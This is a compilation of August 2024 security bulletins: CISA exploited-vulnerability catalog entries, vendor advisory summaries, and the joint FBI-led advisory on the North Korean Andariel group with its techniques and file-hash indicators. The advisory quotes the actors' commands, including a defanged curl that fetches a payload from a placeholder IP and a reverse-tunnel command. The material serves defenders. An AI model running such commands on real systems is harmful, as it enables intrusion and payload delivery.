Versa Networks has released an advisory for a vulnerability (CVE-2024-39717) in Versa Director, a key component in managing SD-WAN networks, used by some Internet Service Providers (ISPs) and Managed Service Providers (MSPs). A cyber threat actor could exploit this vulnerability to take control of an affected system.  CISA urges organizations to apply necessary updates, hunt for any malicious activity, report any positive findings to CISA, and review the following for more information:  Versa Security Bulletin: Update on CVE-2024-39717 – Versa Director Dangerous File Type Upload Vulnerability  Lumen: Taking the Crossroads: The Versa Director Zero-Day Exploitation  CISA has added this vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-38856  Apache OFBiz Incorrect Authorization Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

A critical zero-day vulnerability, CVE-2024-7971, has been identified and patched in Google Chrome. This marks the ninth such vulnerability discovered in 2024. The flaw, which has been actively exploited in the wild, is rooted in a type confusion issue within Chrome’s V8 JavaScript engine. This vulnerability allows attackers to potentially execute arbitrary code on affected systems. [New] On August 26, Google announced that it patched the tenth zero-day vulnerability in Chrome. This vulnerability is also reported as being exploited.

On August 23, 2024, SonicWall issued a security advisory regarding a critical access control vulnerability (CVE-2024-40766) in its SonicOS. This flaw could allow attackers to gain unauthorised access to resources or cause the firewall crash. It is recommended updating as soon as possible.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-7971 Google Chromium V8 Type Confusion Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-39717 Versa Director Dangerous File Type Upload Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

CISA released five Industrial Control Systems (ICS) advisories on August 22, 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-24-235-01 Rockwell Automation Emulate3D ICSA-24-235-02 Rockwell Automation 5015 – AENFTXT ICSA-24-235-03 MOBOTIX P3 and Mx6 Cameras ICSA-24-235-04 Avtec Outpost 0810 ICSA-20-282-02 Mitsubishi Electric MELSEC iQ-R Series (Update D) CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

On August 19, 2024, Moodle released a security advisory addressing sixteen vulnerabilities of various severities. It is recommended updating as soon as possible.

On August 14, 2024, F5 released a security advisory addressing nine vulnerabilities in their products. Four of these vulnerabilities have been classified as high severity due to their potential to facilitate session hijacking and to lead to Denial-of-Service (DoS) attacks.

CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2021-33044 Dahua IP Camera Authentication Bypass Vulnerability CVE-2021-33045 Dahua IP Camera Authentication Bypass Vulnerability CVE-2022-0185 Linux Kernel Heap-Based Buffer Overflow CVE-2021-31196 Microsoft Exchange Server Information Disclosure Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Today, the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), CISA, FBI, NSA, and international partners are releasing Best Practices for Event Logging and Threat Detection. This guide will assist organizations in defining a baseline for event logging to mitigate malicious cyber threats. The increased prevalence of malicious actors employing living off the land (LOTL) techniques, such as living off the land binaries (LOLBins) and fileless malware, highlights the importance of implementing and maintaining an effective event logging program.  CISA encourages public and private sector senior information technology (IT) decision makers, operational technology (OT) operators, network administrators, network operators, and critical infrastructure organizations to review the best practices in the guide and implement recommended actions. These actions can help detect malicious activity, behavioral anomalies, and compromised networks, devices, or accounts. For more information on LOTL techniques, see joint guidance Identifying and Mitigating Living Off the Land Techniques and CISA’s Secure by Design Alert Series. For more information and guidance on event logging and threat detection, see CISA’s Secure Cloud Business Applications (SCuBA) products, network traffic analysis tool Malcom, and Logging Made Easy.

On August 14, 2024, Palo Alto Networks released a security advisory for a critical command injection vulnerability, CVE-2024-5914, in Cortex XSOAR. This flaw allows unauthenticated attackers to execute arbitrary commands within the context of an integration container, potentially compromising the system. The vulnerability affects the product’s CommonScripts Pack and is rated as high severity with a CVSS score of 9.0.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-23897 Jenkins Command Line Interface (CLI) Path Traversal Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

On August 13, 2024, a critical vulnerability, CVE-2024-22116, was disclosed in Zabbix Server, allowing attackers with restricted administrative permissions to execute arbitrary code. The flaw, identified in the Ping script execution within the Monitoring Hosts section, can compromise the entire infrastructure. The vulnerability carries a CVSS score of 9.9.

On August 14, 2024, SolarWinds disclosed a critical remote code execution (RCE) vulnerability, CVE-2024-28986, affecting all versions of their Web Help Desk (WHD) software. The vulnerability, caused by a Java deserialization flaw, allows attackers to execute arbitrary commands on the affected system. The vulnerability has a CVSS score of 9.8.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-28986 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

CISA released eleven Industrial Control Systems (ICS) advisories on August 15, 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-24-228-01 Siemens SCALANCE M-800, RUGGEDCOM RM1224 ICSA-24-228-02 Siemens INTRALOG WMS ICSA-24-228-03 Siemens Teamcenter Visualization and JT2Go ICSA-24-228-04 Siemens SINEC Traffic Analyzer ICSA-24-228-05 Siemens LOGO! V8.3 BM Devices ICSA-24-228-06 Siemens SINEC NMS ICSA-24-228-07 Siemens Location Intelligence ICSA-24-228-08 Siemens COMOS ICSA-24-228-09 Siemens NX ICSA-24-228-10 AVEVA Historian Web Server ICSA-24-228-11 PTC Kepware ThingWorx Kepware Server CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

On August 13, 2024, Microsoft addressed 89 vulnerabilities in its August 2024 Patch Tuesday update, including ten zero-day vulnerabilities. This Patch Tuesday also fixes six critical vulnerabilities.

On August 13, 2024, SAP released a security advisory for a critical authentication bypass vulnerability, CVE-2024-41730, in SAP BusinessObjects Business Intelligence Platform. This flaw allows remote attackers to bypass authentication mechanisms, potentially leading to full system compromise. The vulnerability has a CVSS score of 9.8, highlighting its severity.

On August 13, 2024, Ivanti disclosed a critical authentication bypass vulnerability, CVE-2024-7593, affecting the Ivanti Virtual Traffic Manager (vTM). This flaw allows remote, unauthenticated attackers to bypass authentication and create rogue administrator accounts, posing a significant security risk. The vulnerability is due to an incorrect implementation of the authentication algorithm.

Summary The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju: U.S. Cyber National Mission Force (CNMF) U.S. Cybersecurity and Infrastructure Security Agency (CISA) U.S. Department of Defense Cyber Crime Center (DC3) U.S. National Security Agency (NSA) Republic of Korea’s National Intelligence Service (NIS) Republic of Korea’s National Police Agency (NPA) United Kingdom’s National Cyber Security Centre (NCSC) The RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities. The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration.  The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives. The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations: For additional information on DPRK state-sponsored malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage. Download the PDF version of this report: AA24-207A North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs (PDF, 804.21 KB ) For a downloadable copy of associated indicators of compromise (IOCs), see: AA24-207A STIX XML (XML, 296.99 KB ) AA24-207A STIX JSON (JSON, 140.84 KB ) Technical Details RGB 3rd Bureau Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations. Cyber Espionage The actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information. Table 1. Andariel Cyber Espionage Victimology Industry  Information Targeted Defense Heavy and light tanks and self-propelled howitzers Light strike vehicles and ammunition supply vehicles Littoral combat ships and combatant craft Submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs) Modeling and simulation services Aerospace Fighter aircraft and unmanned aerial vehicles (UAVs) Missiles and missile defense systems Satellites, satellite communications, and nano-satellite technology Surveillance radar, phased-array radar, and other radar systems Nuclear Uranium processing and enrichment Material waste and storage Nuclear power plants Government nuclear facilities and research institutes Engineering Shipbuilding and marine engineering Robot machinery and mechanical arms Additive manufacturing and 3D printing components and technology Casting, fabrication, high-heat metal molding, and rubber and plastic molding Machining processes and technology The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs. Ransomware Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. Malicious Cyber Espionage Activity This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques. Reconnaissance and Enumeration While there is limited available information on the group’s initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include: CVE-2023-46604 – Apache ActiveMQ CVE-2023-42793 – TeamCity  CVE-2023-3519 – Citrix NetScaler CVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM)  CVE-2023-34362 – MOVEIt  CVE-2023-33246 – RocketMQ  CVE-2023-32784 – KeePass  CVE-2023-32315 – Openfire  CVE-2023-3079 – Google Chromium V8 Type Confusion CVE-2023-28771 and CVE-2023-33010 – Zyxell firmware CVE-2023-2868 – Barracuda Email Security Gateway CVE-2023-27997 – FortiGate SSL VPN  CVE-2023-25690 – Apache HTTP Server CVE-2023-21932 – Oracle Hospitality Opera 5 CVE-2023-0669 – GoAnywhere MFT CVE-2022-47966 – ManageEngine  CVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite CVE-2022-30190 – Microsoft Windows Support Diagnostic Tool CVE-2022-25064 – TP-LINK  CVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS CVE-2022-24785 – Moment.js  CVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere  CVE-2022-22965 – Spring4Shell CVE-2022-22947 – Spring Cloud Gateway  CVE-2022-22005 – Microsoft SharePoint Server  CVE-2022-21882 – Win32k Elevation of Privilege  CVE-2021-44228 – Apache Log4j  CVE-2021-44142 – Samba vfs_fruit module  CVE-2021-43226, CEV-2021-43207, CVE-2021-36955 – Windows log file vulnerabilities CVE-2021-41773 – Apache HTTP Server 2.4.49 CVE-2021-40684 – Talend ESB Runtime  CVE-2021-3018 – IPeakCMS 3.5  CVE-2021-20038 – SMA100 Apache httpd server (SonicWall)  CVE-2021-20028 – SonicWall Secure Remote Access (SRA)  CVE-2019-15637 – Tableau  CVE-2019-7609 – Kibana CVE-2019-0708 – Microsoft Remote Desktop Services  CVE-2017-4946 – VMware V4H and V4PA Resource Development, Tooling, and Remote Access Tools The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral movement. Atharvan ELF Backdoor Jupiter MagicRAT “No Pineapple” TigerRAT Valefor/VSingle ValidAlpha YamaBot NukeSped Goat RAT Black RAT AndarLoader DurianBeacon Trifaux KaosRAT Preft Andariel Scheduled Task Malware BottomLoader (see Cisco Talos blog Operation Blacksmith) NineRAT (see Cisco Talos blog Operation Blacksmith) DLang (see Cisco Talos blog Operation Blacksmith) Nestdoor (see AhnLab blog) These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node. Commodity Malware and Dual-Use Applications Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. Dual-use applications are software tools widely available for purchase or use that are commonly utilized by administrators and users for system administration or other legitimate purposes and also by threat actors for malicious activities. These dual-use applications may reside locally, known as Living Off the Land (LOTL) tools, or be transferred to the target system during the attack. The use of publicly available malware and dual-use applications. The use of publicly available malware  and dual-use applications enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the use of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the actors. The actors have at times achieved great success obfuscating their identities by leveraging open source malware. The authoring agencies have identified the following open-source and dual-use tools as used and/or customized by the actors: 3Proxy [T1090] AdFind [S0552] AsyncRAT DeimosC2 Impacket [T1090] Juggernaut [T1040] Lilith RAT ORVX Web Shell Mimikatz [S0002] PLINK [T1572] ProcDump [T1003] PuTTY [T1572] SOCKS5 [T1090] Stunnel [T1572]  Web Shell by Orb (WSO) WinRAR [T1560] WinSCP [T1048] RDP Wrapper [T1572] Initial Access The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190]. Execution The actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat commands, such as netstat –naop and netstat –noa [T1059]. Example commands used by the actors include the following: netstat –naop  netstat –noa pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP> curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe C:\windows\system32\cmd.exe /c systeminfo | findstr Logon These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft Corporation”) found across numerous RGB 3rd Bureau malware samples. Defense Evasion The actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0 and vmp1 for VMProtect and Themida or randomized file section names for Themida [T1027]. Credential Access The actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft utilities and dual-use tools such as Mimikatz, Dumpert, and ProcDump, and accessing the Active Directory domain database through targeting of the NTDS.dit file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003]. Discovery The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083].  The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002]. Lateral Movement The actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp% directory. The actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021]. Command and Control The actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071]. Collection and Exfiltration Malware previously used by the actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling [T1560, T1039]. The actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048]. The actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021]. Indicators of Compromise See below for Andariel IOCs. The following include observed MD5 hashes: 88a7c84ac7f7ed310b5ee791ec8bd6c5 6ab4eb4c23c9e419fbba85884ea141f4 97ce00c7ef1f7d98b48291d73d900181 079b4588eaa99a1e802adf5e0b26d8aa 0873b5744d8ab6e3fe7c9754cf7761a3 0d696d27bae69a62def82e308d28857a 0ecf4bac2b070cf40f0b17e18ce312e6 17c46ed7b80c2e4dbea6d0e88ea0827c 1f2410c3c25dadf9e0943cd634558800 2968c20a07cfc97a167aa3dd54124cda 33e85d0f3ef2020cdb0fc3c8d80e8e69 4118d9adce7350c3eedeb056a3335346 4aa57e1c66c2e01f2da3f106ed2303fa 58ad3103295afcc22bde8d81e77c282f 5c41cbf8a7620e10f158f6b70963d1cb 61a949553d35f31957db6442f36730c5 72a22afde3f820422cfdbba7a4cbabde 84bd45e223b018e67e4662c057f2c47e 86465d92f0d690b62866f52f5283b9fc 8b395cc6ecdec0900facf6e93ec48fbb 97f352e2808c78eef9b31c758ca13032 a50f3b7aa11b977ae89285b60968aa67 afd25ce56b9808c5ed7eade75d2e12a7 afdeb24975a318fc5f20d9e61422a308 b697b81b341692a0b137b2c748310ea7 bcac28919fa33704a01d7a9e5e3ddf3f c027d641c4c1e9d9ad048cda2af85db6 c892c60817e6399f939987bd2bf5dee0 cdeae978f3293f4e783761bc61b34810 d0f310c99476f1712ac082f78dd29fdc d8da33fae924b991b776797ba8cde24c e230c5728f9ea5a94e390e7da7bf1ffa f4d46629ca15313b94992f3798718df7 fb84a392601fc19aeb7f8ce11b3a4907 ff3194d3d5810a42858f3e22c91500b1 13b4ce1fc26d400d34ede460a8530d93 41895c5416fdc82f7e0babc6bb6c7216 c2f8c9bb7df688d0a7030a96314bb493 33a3da2de78418b89a603e28a1e8852c 4896da30a745079cd6265b6332886d45 73eb2f4f101aab6158c615094f7a632a 7f33d2d2a2ce9c195202acb59de31eee e1afd01400ef405e46091e8ef10c721c fe25c192875ec1914b8880ea3896cda2 232586f8cfe82b80fd0dfa6ed8795c56 c1f266f7ec886278f030e7d7cd4e9131 49bb2ad67a8c5dfbfe8db2169e6fa46e beb199b15bd075996fa8d6a0ed554ca8 4053ca3e37ed1f8d37b29eed61c2e729 3a0c8ae783116c1840740417c4fbe678 0414a2ab718d44bf6f7103cff287b312 ca564428a29faf1a613f35d9fa36313f ad6d4eb34d29e350f96dc8df6d8a092e dc70dc9845aa747001ebf2a02467c203 3d2ec58f37c8176e0dbcc47ff93e5a76 0a09b7f2317b3d5f057180be6b6d0755 1ffccc23fef2964e9b1747098c19d956 9112efb49cae021abebd3e9a564e6ca4 ac0ada011f1544aa3a1cf27a26f2e288 0211a3160cc5871cbcd4e5514449162b 7416ea48102e2715c87edd49ddbd1526 a2aefb7ab6c644aa8eeb482e27b2dbc4 e7fd7f48fbf5635a04e302af50dfb651 33b2b5b7c830c34c688cf6ced287e5be e5410abaaac69c88db84ab3d0e9485ac eb35b75369805e7a6371577b1d2c4531 5a3f3f75048b9cec177838fb8b40b945 9d7bd0caed10cc002670faff7ca130f5 8434cdd34425916be234b19f933ad7ea bbaee4fe73ccff1097d635422fdc0483 79e474e056b4798e0a3e7c60dd67fd28 95c276215dcc1bd7606c0cb2be06bf70 426bb55531e8e3055c942a1a035e46b9 cfae52529468034dbbb40c9a985fa504 deae4be61c90ad6d499f5bdac5dad242 bda0686d02a8b7685adf937cbcd35f46 6de6c27ca8f4e00f0b3e8ff5185a59d1 c61a8c4f6f6870c7ca0013e084b893d2 5291aed100cc48415636c4875592f70c f4795f7aec4389c8323f7f40b50ae46f cf1a90e458966bcba8286d46d6ab052c 792370eb01e16ac3dc511143932d0e1d 612538328e0c4f3e445fb58ef811336a 9767aa592ec2d6ae3c7d40b6049d0466 b22fd0604c4f189f2b7a59c8f48882dd e53ca714787a86c13f07942a56d64efa c7b09f1dd0a5694de677f3ecceda41b7 c8346b39418f92725719f364068a218d 730bff14e80ffd7737a97cdf11362ab5 9a481bc83fea1dea3e3bdfff5e154d44 ddb1f970371fa32faae61fc5b8423d4b 6c2b947921e7c77d9af62ce9a3ed7621 977d30b261f64cc582b48960909d0a89 7ce51b56a6b0f8f78056ddfc5b5de67c dd9625be4a1201c6dfb205c12cf3a381 ecb4a09618e2aba77ea37bd011d7d7f7 0fd8c6f56c52c21c061a94e5765b27b4 c90d094a8fbeaa8a0083c7372bfc1897 0055a266aa536b2fdadb3336ef8d4fba 55bb271bbbf19108fec73d224c9b4218 0c046a2f5304ed8d768795a49b99d6e4 f34664e0d9a10974da117c1ca859dba8 a2c2099d503fcc29478205f5aef0283b e439f850aa8ead560c99a8d93e472225 7c30ed6a612a1fd252565300c03c7523 81738405a7783c09906da5c7212e606b c027d641c4c1e9d9ad048cda2af85db6 eb7ba9f7424dffdb7d695b00007a3c6d 3e9ee5982e3054dc76d3ba5cc88ae3de 073e3170a8e7537ff985ec8316319351 9b0e7c460a80f740d455a7521f0eada1 2d02f5499d35a8dffb4c8bc0b7fec5c2 0984954526232f7d05910aa5b07c5893 4156a7283284ece739e1bae05f99e17c 3026d419ee140f3c6acd5bff54132795 7aa132c0cc63a38fb4d1789553266fc7 1a0811472fad0ff507a92c957542fffd f8aef59d0c5afe8df31e11a1984fbc0a 82491b42b9a2d34b13137e36784a67d7 0a199944f757d5615164e8808a3c712a 9c97ea18da290a6833a1d36e2d419efc 16f768eac33f79775a9672018e0d64f5 The following include observed SHA-256 hashes: ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6 db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984 773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df 05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe 1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb 6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1 b7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be 66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66 def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563 323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9 74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643 1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5 c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4 452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19 199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1 2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc ce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694 db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984 